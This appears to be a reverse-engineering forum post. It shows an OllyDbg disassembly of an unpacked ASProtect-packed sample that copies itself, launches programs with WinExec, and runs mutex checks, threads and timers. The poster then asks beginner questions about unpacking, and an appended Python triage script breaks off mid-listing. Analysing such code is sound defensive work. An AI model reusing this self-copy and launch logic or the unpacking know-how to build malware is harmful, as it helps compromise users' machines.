0040FC32 |. E8 4D4AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC37 |. 6A 01 push 1
0040FC39 |. 8D85 D8FEFFFF lea eax, dword ptr ss:[ebp-128]
0040FC3F |. E8 DC7DFFFF call 00407A20
0040FC44 |. FFB5 D8FEFFFF push dword ptr ss:[ebp-128]
0040FC4A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FC4F |. FF30 push dword ptr ds:[eax]
0040FC51 |. FF37 push dword ptr ds:[edi]
0040FC53 |. 8D85 DCFEFFFF lea eax, dword ptr ss:[ebp-124]
0040FC59 |. BA 03000000 mov edx, 3
0040FC5E |. E8 F540FFFF call 00403D58
0040FC63 |. 8B85 DCFEFFFF mov eax, dword ptr ss:[ebp-124]
0040FC69 |. E8 2A42FFFF call 00403E98
0040FC6E |. 50 push eax ; |CmdLine
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FC74 |. 6A 01 push 1
0040FC76 |. 8D85 D0FEFFFF lea eax, dword ptr ss:[ebp-130]
0040FC7C |. E8 4F7EFFFF call 00407AD0
0040FC81 |. FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
0040FC87 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC8C |. FF30 push dword ptr ds:[eax]
0040FC8E |. FF37 push dword ptr ds:[edi]
0040FC90 |. 8D85 D4FEFFFF lea eax, dword ptr ss:[ebp-12C]
0040FC96 |. BA 03000000 mov edx, 3
0040FC9B |. E8 B840FFFF call 00403D58
0040FCA0 |. 8B85 D4FEFFFF mov eax, dword ptr ss:[ebp-12C]
0040FCA6 |. E8 ED41FFFF call 00403E98
0040FCAB |. 50 push eax ; |CmdLine
0040FCAC |. E8 F34AFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FCB1 |. BE 17000000 mov esi, 17
0040FCB6 |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040FCBC |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040FCC1 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040FCC3 |. E8 A03EFFFF |call 00403B68
0040FCC8 |. 8D95 CCFEFFFF |lea edx, dword ptr ss:[ebp-134]
0040FCCE |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040FCD3 |. 8B00 |mov eax, dword ptr ds:[eax]
0040FCD5 |. E8 2667FFFF |call 00406400
0040FCDA |. 8B85 CCFEFFFF |mov eax, dword ptr ss:[ebp-134]
0040FCE0 |. 50 |push eax
0040FCE1 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040FCE6 |. FF30 |push dword ptr ds:[eax]
0040FCE8 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040FCED |. FF30 |push dword ptr ds:[eax]
0040FCEF |. FF37 |push dword ptr ds:[edi]
0040FCF1 |. 8D85 C4FEFFFF |lea eax, dword ptr ss:[ebp-13C]
0040FCF7 |. BA 03000000 |mov edx, 3
0040FCFC |. E8 5740FFFF |call 00403D58
0040FD01 |. 8B85 C4FEFFFF |mov eax, dword ptr ss:[ebp-13C]
0040FD07 |. 8D95 C8FEFFFF |lea edx, dword ptr ss:[ebp-138]
0040FD0D |. E8 EE66FFFF |call 00406400
0040FD12 |. 8B95 C8FEFFFF |mov edx, dword ptr ss:[ebp-138]
0040FD18 |. 58 |pop eax
0040FD19 |. E8 C640FFFF |call 00403DE4
0040FD1E |. 74 05 |je short 0040FD25
0040FD20 |. E8 A761FFFF |call 00405ECC
0040FD25 |> 83C3 04 |add ebx, 4
0040FD28 |. 4E |dec esi
0040FD29 |.^ 75 91 \jnz short 0040FCBC
0040FD2B |. E9 C0050000 jmp 004102F0
0040FD30 |> A1 34154100 mov eax, dword ptr ds:[411534]
0040FD35 |. BA 04010000 mov edx, 104
0040FD3A |. E8 8142FFFF call 00403FC0
0040FD3F |. 68 04010000 push 104
0040FD44 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD49 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD4B |. E8 4841FFFF call 00403E98
0040FD50 |. 50 push eax ; |PathBuffer
0040FD51 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FD56 |. 50 push eax ; |hModule => NULL
0040FD57 |. E8 C049FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FD5C |. 8BD0 mov edx, eax
0040FD5E |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD63 |. E8 5842FFFF call 00403FC0
0040FD68 |. E8 DB85FFFF call 00408348
0040FD6D |. 8D95 C0FEFFFF lea edx, dword ptr ss:[ebp-140]
0040FD73 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD78 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD7A |. E8 8166FFFF call 00406400
0040FD7F |. 8B85 C0FEFFFF mov eax, dword ptr ss:[ebp-140]
0040FD85 |. 50 push eax
0040FD86 |. 8D85 B4FEFFFF lea eax, dword ptr ss:[ebp-14C]
0040FD8C |. E8 8F7CFFFF call 00407A20
0040FD91 |. FFB5 B4FEFFFF push dword ptr ss:[ebp-14C]
0040FD97 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FD9C |. FF30 push dword ptr ds:[eax]
0040FD9E |. FF37 push dword ptr ds:[edi]
0040FDA0 |. 8D85 B8FEFFFF lea eax, dword ptr ss:[ebp-148]
0040FDA6 |. BA 03000000 mov edx, 3
0040FDAB |. E8 A83FFFFF call 00403D58
0040FDB0 |. 8B85 B8FEFFFF mov eax, dword ptr ss:[ebp-148]
0040FDB6 |. 8D95 BCFEFFFF lea edx, dword ptr ss:[ebp-144]
0040FDBC |. E8 3F66FFFF call 00406400
0040FDC1 |. 8B95 BCFEFFFF mov edx, dword ptr ss:[ebp-144]
0040FDC7 |. 58 pop eax
0040FDC8 |. E8 1740FFFF call 00403DE4
0040FDCD |. 0F85 7E020000 jnz 00410051
0040FDD3 |. 6A 00 push 0 ; /Title = NULL
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FDDA |. E8 E549FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
0040FDDF |. 85C0 test eax, eax
0040FDE1 |. 0F84 09050000 je 004102F0
0040FDE7 |. 8D95 B0FEFFFF lea edx, dword ptr ss:[ebp-150]
0040FDED |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FDF2 |. 8B00 mov eax, dword ptr ds:[eax]
0040FDF4 |. E8 A368FFFF call 0040669C
0040FDF9 |. 8D85 B0FEFFFF lea eax, dword ptr ss:[ebp-150]
0040FDFF |. 50 push eax
0040FE00 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
0040FE06 |. E8 BD62FFFF call 004060C8
0040FE0B |. 8B85 A8FEFFFF mov eax, dword ptr ss:[ebp-158]
0040FE11 |. 8D95 ACFEFFFF lea edx, dword ptr ss:[ebp-154]
0040FE17 |. E8 707DFFFF call 00407B8C
0040FE1C |. 8B95 ACFEFFFF mov edx, dword ptr ss:[ebp-154]
0040FE22 |. 58 pop eax
0040FE23 |. E8 783EFFFF call 00403CA0
0040FE28 |. 8B85 B0FEFFFF mov eax, dword ptr ss:[ebp-150]
0040FE2E |. E8 6540FFFF call 00403E98
0040FE33 |. 50 push eax ; /MutexName
0040FE34 |. 6A 00 push 0 ; |Inheritable = FALSE
0040FE36 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FE40 |. 85C0 test eax, eax
0040FE42 |. 0F85 A8040000 jnz 004102F0
0040FE48 |. 8D95 A4FEFFFF lea edx, dword ptr ss:[ebp-15C]
0040FE4E |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FE53 |. 8B00 mov eax, dword ptr ds:[eax]
0040FE55 |. E8 4268FFFF call 0040669C
0040FE5A |. 8D85 A4FEFFFF lea eax, dword ptr ss:[ebp-15C]
0040FE60 |. 50 push eax
0040FE61 |. 8D85 9CFEFFFF lea eax, dword ptr ss:[ebp-164]
0040FE67 |. E8 5C62FFFF call 004060C8
0040FE6C |. 8B85 9CFEFFFF mov eax, dword ptr ss:[ebp-164]
0040FE72 |. 8D95 A0FEFFFF lea edx, dword ptr ss:[ebp-160]
0040FE78 |. E8 0F7DFFFF call 00407B8C
0040FE7D |. 8B95 A0FEFFFF mov edx, dword ptr ss:[ebp-160]
0040FE83 |. 58 pop eax
0040FE84 |. E8 173EFFFF call 00403CA0
0040FE89 |. 8B85 A4FEFFFF mov eax, dword ptr ss:[ebp-15C]
0040FE8F |. E8 0440FFFF call 00403E98
0040FE94 |. 50 push eax ; /Arg3
0040FE95 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FE97 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FE99 |. E8 FE47FFFF call 0040469C ; \1.0040469C
0040FE9E |. 8B15 9C144100 mov edx, dword ptr ds:[41149C] ; 1.0041278C
0040FEA4 |. 8902 mov dword ptr ds:[edx], eax
0040FEA6 |. 8D95 98FEFFFF lea edx, dword ptr ss:[ebp-168]
0040FEAC |. A1 24154100 mov eax, dword ptr ds:[411524]
0040FEB1 |. 8B00 mov eax, dword ptr ds:[eax]
0040FEB3 |. E8 E467FFFF call 0040669C
0040FEB8 |. 8B85 98FEFFFF mov eax, dword ptr ss:[ebp-168]
0040FEBE |. E8 D53FFFFF call 00403E98
0040FEC3 |. 50 push eax ; /Arg3
0040FEC4 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FEC6 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FEC8 |. E8 CF47FFFF call 0040469C ; \1.0040469C
0040FECD |. 8B15 AC144100 mov edx, dword ptr ds:[4114AC] ; 1.00412790
0040FED3 |. 8902 mov dword ptr ds:[edx], eax
0040FED5 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEDA |. BA 04010000 mov edx, 104
0040FEDF |. E8 DC40FFFF call 00403FC0
0040FEE4 |. 68 04010000 push 104
0040FEE9 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEEE |. 8B00 mov eax, dword ptr ds:[eax]
0040FEF0 |. E8 A33FFFFF call 00403E98
0040FEF5 |. 50 push eax ; |PathBuffer
0040FEF6 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FEFB |. 50 push eax ; |hModule => NULL
0040FEFC |. E8 1B48FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FF01 |. 8BD0 mov edx, eax
0040FF03 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FF08 |. E8 B340FFFF call 00403FC0
0040FF0D |. E8 3684FFFF call 00408348
0040FF12 |. E8 9D6AFFFF call 004069B4
0040FF17 |. A1 70154100 mov eax, dword ptr ds:[411570]
0040FF1C |. 50 push eax ; /pThreadId => 1.004126D8
0040FF1D |. 6A 00 push 0 ; |CreationFlags = 0
0040FF1F |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF21 |. 68 C8C74000 push 0040C7C8 ; |ThreadFunction = 1.0040C7C8
0040FF26 |. 6A 00 push 0 ; |StackSize = 0
0040FF28 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF2F |. A1 78154100 mov eax, dword ptr ds:[411578]
0040FF34 |. 50 push eax ; /pThreadId => 1.004126DC
0040FF35 |. 6A 00 push 0 ; |CreationFlags = 0
0040FF37 |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF39 |. 68 4CA34000 push 0040A34C ; |ThreadFunction = 1.0040A34C
0040FF3E |. 6A 00 push 0 ; |StackSize = 0
0040FF40 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF42 |. E8 7547FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF47 |. 68 3CEA4000 push 0040EA3C ; /Timerproc = 1.0040EA3C
0040FF4C |. 68 14050000 push 514 ; |Timeout = 1300. ms
0040FF51 |. 6A 00 push 0 ; |TimerID = 0
0040FF53 |. 6A 00 push 0 ; |hWnd = NULL
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF5A |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
0040FF60 |. 8902 mov dword ptr ds:[edx], eax
0040FF62 |. 68 F0EE4000 push 0040EEF0 ; /Timerproc = 1.0040EEF0
0040FF67 |. 68 88130000 push 1388 ; |Timeout = 5000. ms
0040FF6C |. 6A 00 push 0 ; |TimerID = 0
0040FF6E |. 6A 00 push 0 ; |hWnd = NULL
0040FF70 |. E8 A748FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF75 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0040FF7B |. 8902 mov dword ptr ds:[edx], eax
0040FF7D |. 68 08EF4000 push 0040EF08 ; /Timerproc = 1.0040EF08
0040FF82 |. 68 98080000 push 898 ; |Timeout = 2200. ms
0040FF87 |. 6A 00 push 0 ; |TimerID = 0
0040FF89 |. 6A 00 push 0 ; |hWnd = NULL
0040FF8B |. E8 8C48FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF90 |. 8B15 C4144100 mov edx, dword ptr ds:[4114C4] ; 1.004130A4
0040FF96 |. 8902 mov dword ptr ds:[edx], eax
0040FF98 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FF9D |. 8B00 mov eax, dword ptr ds:[eax]
0040FF9F |. BA A0044100 mov edx, 004104A0 ; ASCII "no"
0040FFA4 |. E8 3B3EFFFF call 00403DE4
0040FFA9 |. 74 3B je short 0040FFE6
0040FFAB |. 68 A8C44000 push 0040C4A8
0040FFB0 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FFB5 |. 8B00 mov eax, dword ptr ds:[eax]
0040FFB7 |. E8 7864FFFF call 00406434
0040FFBC |. 50 push eax ; |Timeout
0040FFBD |. 6A 00 push 0 ; |TimerID = 0
0040FFBF |. 6A 00 push 0 ; |hWnd = NULL
0040FFC1 |. E8 5648FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FFC6 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0040FFCC |. 8902 mov dword ptr ds:[edx], eax
0040FFCE |. EB 16 jmp short 0040FFE6
0040FFD0 |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
0040FFD5 |. 50 |push eax ; /pMsg => WM_NULL
0040FFD6 |. E8 4948FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
0040FFDB |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0040FFE0 |. 50 |push eax ; /pMsg => WM_NULL
0040FFE1 |. E8 D647FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
0040FFE6 |> 6A 00 push 0 ; /MsgFilterMax = 0
0040FFE8 |. 6A 00 |push 0 ; |MsgFilterMin = 0
0040FFEA |. 6A 00 |push 0 ; |hWnd = NULL
0040FFEC |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0040FFF1 |. 50 |push eax ; |pMsg => 1.004126B8
0040FFF2 |. E8 E547FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
0040FFF7 |. 85C0 |test eax, eax
0040FFF9 |.^ 75 D5 \jnz short 0040FFD0
0040FFFB |. A1 74154100 mov eax, dword ptr ds:[411574]
00410000 |. 8B00 mov eax, dword ptr ds:[eax]
00410002 |. 50 push eax ; /TimerID
00410003 |. 6A 00 push 0 ; |hWnd = NULL
00410005 |. E8 FA47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
0041000A |. A1 84154100 mov eax, dword ptr ds:[411584]
0041000F |. 8B00 mov eax, dword ptr ds:[eax]
00410011 |. 50 push eax ; /TimerID
00410012 |. 6A 00 push 0 ; |hWnd = NULL
00410014 |. E8 EB47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410019 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
0041001E |. 8B00 mov eax, dword ptr ds:[eax]
00410020 |. 50 push eax ; /TimerID
00410021 |. 6A 00 push 0 ; |hWnd = NULL
00410023 |. E8 DC47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410028 |. A1 C4144100 mov eax, dword ptr ds:[4114C4]
0041002D |. 8B00 mov eax, dword ptr ds:[eax]
0041002F |. 50 push eax ; /TimerID
00410030 |. 6A 00 push 0 ; |hWnd = NULL
00410032 |. E8 CD47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410037 |. A1 9C144100 mov eax, dword ptr ds:[41149C]
0041003C |. 8B00 mov eax, dword ptr ds:[eax]
0041003E |. 50 push eax ; /hMutex
0041003F |. E8 3047FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410044 |. A1 AC144100 mov eax, dword ptr ds:[4114AC]
00410049 |. 8B00 mov eax, dword ptr ds:[eax]
0041004B |. 50 push eax ; /hMutex
0041004C |. E8 2347FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410051 |> 8D95 94FEFFFF lea edx, dword ptr ss:[ebp-16C]
00410057 |. A1 34154100 mov eax, dword ptr ds:[411534]
0041005C |. 8B00 mov eax, dword ptr ds:[eax]
0041005E |. E8 9D63FFFF call 00406400
00410063 |. 8B85 94FEFFFF mov eax, dword ptr ss:[ebp-16C]
00410069 |. 50 push eax
0041006A |. 8D85 88FEFFFF lea eax, dword ptr ss:[ebp-178]
00410070 |. E8 5B7AFFFF call 00407AD0
00410075 |. FFB5 88FEFFFF push dword ptr ss:[ebp-178]
0041007B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
00410080 |. FF30 push dword ptr ds:[eax]
00410082 |. FF37 push dword ptr ds:[edi]
00410084 |. 8D85 8CFEFFFF lea eax, dword ptr ss:[ebp-174]
0041008A |. BA 03000000 mov edx, 3
0041008F |. E8 C43CFFFF call 00403D58
00410094 |. 8B85 8CFEFFFF mov eax, dword ptr ss:[ebp-174]
0041009A |. 8D95 90FEFFFF lea edx, dword ptr ss:[ebp-170]
004100A0 |. E8 5B63FFFF call 00406400
004100A5 |. 8B95 90FEFFFF mov edx, dword ptr ss:[ebp-170]
004100AB |. 58 pop eax
004100AC |. E8 333DFFFF call 00403DE4
004100B1 |. 0F85 39020000 jnz 004102F0
004100B7 |. 6A 00 push 0 ; /Title = NULL
004100B9 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
004100BE |. E8 0147FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
004100C3 |. 85C0 test eax, eax
004100C5 |. 0F84 25020000 je 004102F0
004100CB |. 8D85 80FEFFFF lea eax, dword ptr ss:[ebp-180]
004100D1 |. E8 F25FFFFF call 004060C8
004100D6 |. 8B85 80FEFFFF mov eax, dword ptr ss:[ebp-180]
004100DC |. 8D95 84FEFFFF lea edx, dword ptr ss:[ebp-17C]
004100E2 |. E8 A57AFFFF call 00407B8C
004100E7 |. 8D85 84FEFFFF lea eax, dword ptr ss:[ebp-17C]
004100ED |. 50 push eax
004100EE |. 8D95 7CFEFFFF lea edx, dword ptr ss:[ebp-184]
004100F4 |. A1 64144100 mov eax, dword ptr ds:[411464]
004100F9 |. 8B00 mov eax, dword ptr ds:[eax]
004100FB |. E8 9C65FFFF call 0040669C
00410100 |. 8B95 7CFEFFFF mov edx, dword ptr ss:[ebp-184]
00410106 |. 58 pop eax
00410107 |. E8 943BFFFF call 00403CA0
0041010C |. 8B85 84FEFFFF mov eax, dword ptr ss:[ebp-17C]
00410112 |. E8 813DFFFF call 00403E98
00410117 |. 50 push eax ; /MutexName
00410118 |. 6A 00 push 0 ; |Inheritable = FALSE
0041011A |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0041011F |. E8 4046FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
00410124 |. 85C0 test eax, eax
00410126 |. 0F85 C4010000 jnz 004102F0
0041012C |. 8D85 74FEFFFF lea eax, dword ptr ss:[ebp-18C]
00410132 |. E8 915FFFFF call 004060C8
00410137 |. 8B85 74FEFFFF mov eax, dword ptr ss:[ebp-18C]
0041013D |. 8D95 78FEFFFF lea edx, dword ptr ss:[ebp-188]
00410143 |. E8 447AFFFF call 00407B8C
00410148 |. 8D85 78FEFFFF lea eax, dword ptr ss:[ebp-188]
0041014E |. 50 push eax
0041014F |. 8D95 70FEFFFF lea edx, dword ptr ss:[ebp-190]
00410155 |. A1 64144100 mov eax, dword ptr ds:[411464]
0041015A |. 8B00 mov eax, dword ptr ds:[eax]
0041015C |. E8 3B65FFFF call 0040669C
00410161 |. 8B95 70FEFFFF mov edx, dword ptr ss:[ebp-190]
00410167 |. 58 pop eax
00410168 |. E8 333BFFFF call 00403CA0
0041016D |. 8B85 78FEFFFF mov eax, dword ptr ss:[ebp-188]
00410173 |. E8 203DFFFF call 00403E98
00410178 |. 50 push eax ; /Arg3
00410179 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0041017B |. 6A 00 push 0 ; |Arg1 = 00000000
0041017D |. E8 1A45FFFF call 0040469C ; \1.0040469C
00410182 |. 8B15 88154100 mov edx, dword ptr ds:[411588] ; 1.00412794
00410188 |. 8902 mov dword ptr ds:[edx], eax
0041018A |. 8D95 6CFEFFFF lea edx, dword ptr ss:[ebp-194]
00410190 |. A1 40154100 mov eax, dword ptr ds:[411540]
00410195 |. 8B00 mov eax, dword ptr ds:[eax]
00410197 |. E8 0065FFFF call 0040669C
0041019C |. 8B85 6CFEFFFF mov eax, dword ptr ss:[ebp-194]
004101A2 |. E8 F13CFFFF call 00403E98
004101A7 |. 50 push eax ; /Arg3
004101A8 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
004101AA |. 6A 00 push 0 ; |Arg1 = 00000000
004101AC |. E8 EB44FFFF call 0040469C ; \1.0040469C
004101B1 |. 8B15 20154100 mov edx, dword ptr ds:[411520] ; 1.00412798
004101B7 |. 8902 mov dword ptr ds:[edx], eax
004101B9 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101BE |. BA 04010000 mov edx, 104
004101C3 |. E8 F83DFFFF call 00403FC0
004101C8 |. 68 04010000 push 104
004101CD |. A1 34154100 mov eax, dword ptr ds:[411534]
004101D2 |. 8B00 mov eax, dword ptr ds:[eax]
004101D4 |. E8 BF3CFFFF call 00403E98
004101D9 |. 50 push eax ; |PathBuffer
004101DA |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
004101DF |. 50 push eax ; |hModule => NULL
004101E0 |. E8 3745FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
004101E5 |. 8BD0 mov edx, eax
004101E7 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101EC |. E8 CF3DFFFF call 00403FC0
004101F1 |. E8 5281FFFF call 00408348
004101F6 |. E8 B967FFFF call 004069B4
004101FB |. A1 70154100 mov eax, dword ptr ds:[411570]
00410200 |. 50 push eax ; /pThreadId => 1.004126D8
00410201 |. 6A 00 push 0 ; |CreationFlags = 0
00410203 |. 6A 00 push 0 ; |pThreadParm = NULL
00410205 |. 68 E0E64000 push 0040E6E0 ; |ThreadFunction = 1.0040E6E0
0041020A |. 6A 00 push 0 ; |StackSize = 0
0041020C |. 6A 00 push 0 ; |pSecurity = NULL
0041020E |. E8 A944FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
00410213 |. A1 78154100 mov eax, dword ptr ds:[411578]
00410218 |. 50 push eax ; /pThreadId => 1.004126DC
00410219 |. 6A 00 push 0 ; |CreationFlags = 0
0041021B |. 6A 00 push 0 ; |pThreadParm = NULL
0041021D |. 68 D8BD4000 push 0040BDD8 ; |ThreadFunction = 1.0040BDD8
00410222 |. 6A 00 push 0 ; |StackSize = 0
00410224 |. 6A 00 push 0 ; |pSecurity = NULL
00410226 |. E8 9144FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0041022B |. 68 A0EC4000 push 0040ECA0 ; /Timerproc = 1.0040ECA0
00410230 |. 68 14050000 push 514 ; |Timeout = 1300. ms
00410235 |. 6A 00 push 0 ; |TimerID = 0
00410237 |. 6A 00 push 0 ; |hWnd = NULL
00410239 |. E8 DE45FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0041023E |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
00410244 |. 8902 mov dword ptr ds:[edx], eax
00410246 |. 68 E4EE4000 push 0040EEE4 ; /Timerproc = 1.0040EEE4
0041024B |. 68 70170000 push 1770 ; |Timeout = 6000. ms
00410250 |. 6A 00 push 0 ; |TimerID = 0
00410252 |. 6A 00 push 0 ; |hWnd = NULL
00410254 |. E8 C345FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410259 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0041025F |. 8902 mov dword ptr ds:[edx], eax
00410261 |. 68 0CF24000 push 0040F20C ; /Timerproc = 1.0040F20C
00410266 |. 68 E8030000 push 3E8 ; |Timeout = 1000. ms
0041026B |. 6A 00 push 0 ; |TimerID = 0
0041026D |. 6A 00 push 0 ; |hWnd = NULL
0041026F |. E8 A845FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410274 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0041027A |. 8902 mov dword ptr ds:[edx], eax
0041027C |. EB 16 jmp short 00410294
0041027E |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
00410283 |. 50 |push eax ; /pMsg => WM_NULL
00410284 |. E8 9B45FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
00410289 |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0041028E |. 50 |push eax ; /pMsg => WM_NULL
0041028F |. E8 2845FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
00410294 |> 6A 00 push 0 ; /MsgFilterMax = 0
00410296 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00410298 |. 6A 00 |push 0 ; |hWnd = NULL
0041029A |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0041029F |. 50 |push eax ; |pMsg => 1.004126B8
004102A0 |. E8 3745FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
004102A5 |. 85C0 |test eax, eax
004102A7 |.^ 75 D5 \jnz short 0041027E
004102A9 |. A1 74154100 mov eax, dword ptr ds:[411574]
004102AE |. 8B00 mov eax, dword ptr ds:[eax]
004102B0 |. 50 push eax ; /TimerID
004102B1 |. 6A 00 push 0 ; |hWnd = NULL
004102B3 |. E8 4C45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102B8 |. A1 84154100 mov eax, dword ptr ds:[411584]
004102BD |. 8B00 mov eax, dword ptr ds:[eax]
004102BF |. 50 push eax ; /TimerID
004102C0 |. 6A 00 push 0 ; |hWnd = NULL
004102C2 |. E8 3D45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102C7 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
004102CC |. 8B00 mov eax, dword ptr ds:[eax]
004102CE |. 50 push eax ; /TimerID
004102CF |. 6A 00 push 0 ; |hWnd = NULL
004102D1 |. E8 2E45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102D6 |. A1 88154100 mov eax, dword ptr ds:[411588]
004102DB |. 8B00 mov eax, dword ptr ds:[eax]
004102DD |. 50 push eax ; /hMutex
004102DE |. E8 9144FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102E3 |. A1 20154100 mov eax, dword ptr ds:[411520]
004102E8 |. 8B00 mov eax, dword ptr ds:[eax]
004102EA |. 50 push eax ; /hMutex
004102EB |. E8 8444FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102F0 |> 33C0 xor eax, eax
004102F2 |. 5A pop edx
004102F3 |. 59 pop ecx
004102F4 |. 59 pop ecx
004102F5 |. 64:8910 mov dword ptr fs:[eax], edx
004102F8 |. 68 25034100 push 00410325
004102FD |> 8D85 6CFEFFFF lea eax, dword ptr ss:[ebp-194]
00410303 |. BA 39000000 mov edx, 39
00410308 |. E8 2B38FFFF call 00403B38
0041030D |. 8D85 78FFFFFF lea eax, dword ptr ss:[ebp-88]
00410313 |. BA 1E000000 mov edx, 1E
00410318 |. E8 1B38FFFF call 00403B38
0041031D \. C3 retn
Sorry for being so long-winded; I hope the experts won't mind the trouble.
I have a few questions here for any experts passing by:
1. After unpacking ASPR you normally have to repair it, either by hand or with a script, but this one doesn't seem to need that. Is it because there is another layer of packer inside that has already encrypted the IAT?
2. In ASPR there is always some code that jumps to an instruction you can't see in OD, yet as soon as you jump there the instruction appears; but the moment you scroll the window it changes again. Why is that?
These are the problems I ran into while tracing along with other people's featured posts. I don't know whether these are very basic questions; my level is pretty poor.
Excuse me if this makes the experts laugh.
It's already two in the morning now; I'll analyze its workflow slowly later. Time to rest.
And I've taken up the precious time of the experts who read this newbie's post.
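As an added example (not from the original post or the sample it traces), here is a Python script that parses OllyDbg listing lines like the ones above, pulls out the resolved imports and string constants, and maps them to the behaviour summary a defender would want from this dump: file tampering, Run-key persistence, self-copy and launch, mutex gating, threads and timers. The excerpt it runs on is constructed from the post's own listing; the category names are mine, and the HKEY mapping assumes, following the Delphi register convention visible in the listing, that the `mov eax, 80000002` just before the registry helper carries the root key.

```python
"""Triage an OllyDbg listing for the Win32 APIs it calls.

Added example, not code from the original post.  It reads listing lines in the
format OllyDbg produces (address, bytes, mnemonic, ';' comment with the
resolved import or string) and summarises what the traced code does.
"""
import re

# Excerpt constructed from the post's own dump of the unpacked code.
SAMPLE_LISTING = r"""
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
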